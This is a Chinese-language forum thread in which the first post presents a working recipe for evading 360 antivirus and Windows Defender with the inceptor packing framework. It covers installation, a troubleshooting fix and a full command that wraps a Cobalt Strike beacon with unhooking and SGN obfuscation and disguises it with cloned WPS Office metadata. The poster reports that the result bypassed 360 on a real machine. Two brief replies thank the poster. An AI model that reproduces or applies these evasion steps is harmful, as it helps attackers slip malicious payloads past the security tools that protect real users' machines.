90_ 发表于 2022-10-26 16:21:17

免杀360?我推荐这个!

inceptor 安装与使用
https://github.com/klezVirus/inceptor/

安装:

本机环境:Windows + VS2022 + LLVM

virtualenv 的两步是创建干净的python环境 如果不需要可以跳过

gitclone --recursive https://github.com/klezVirus/inceptor.git
cd inceptor
virtualenv venv
venv \Scripts\activate.bat
pip install -r requirements.txt
cd inceptor
python update- config.py
最后根据选项选择即可。如果没有的工具它会帮你下。有VS直接大部分工具都是有的。

踩坑:
No module named 'obfuscators.powershell.chameleon.chameleon'
这个报错是因为没下到chameleon

手动下载 https://github.com/klezVirus/cha ... c427962a2b654a5a9d2

将内容放到chameleon文件夹下即可




使用指南
$ usage: inceptor.py [-h] [-hh] [-Z] {native,dotnet,powershell} ...

inceptor: A Windows-based PE Packing framework designed to help
          Red Team Operators to bypass common AV and EDR solutions

positional arguments:
{native,dotnet,powershell}
    native            Native Binaries Generator
    dotnet            .NET Binaries Generator
    powershell          PowerShell Wrapper Scripts Generator

optional arguments:
-h, --help            show this help message and exit
-hh                   Show functional table
-Z, --check         Check file against ThreatCheck
给出一个使用loader的例子:
python inceptor.py native -tloader -C cl -o ceshi14.exe -munhook --sgn --clone "C:\Users\Administrator\AppData\Local\Kingsoft\WPSOffice\11.1.0.12313\office6\wps.exe" --delay 3beacon.raw
这里参数的参数:加载unhook模板,使用sgn 混淆shellcode,克隆metadata、延时、cs的beacon.raw 生成加载器。

22.10.1 过360(真机)、df



注意:

使用syscall的时候因为作者只写了注入模板,所以必须使用-P -P0 explorer 进行注入。(不免杀,免杀的模板得自己写)

总结:

公开项目的免杀总会被查杀,并且免杀是一个多维度、多方面、大量技术的结合,这个项目的亮点是提供一种模板组合的方式去进行免杀,可以参考这种思路写出自己的免杀框架,然后对于新技术就添加到自己框架之中,以一贯之,提供便利。


Dixon 发表于 2022-10-29 11:30:16

看看学习一下

亮哥哥 发表于 2022-11-2 15:13:27

谢谢90分享:lol:lol:lol
页: [1]
查看完整版本: 免杀360?我推荐这个!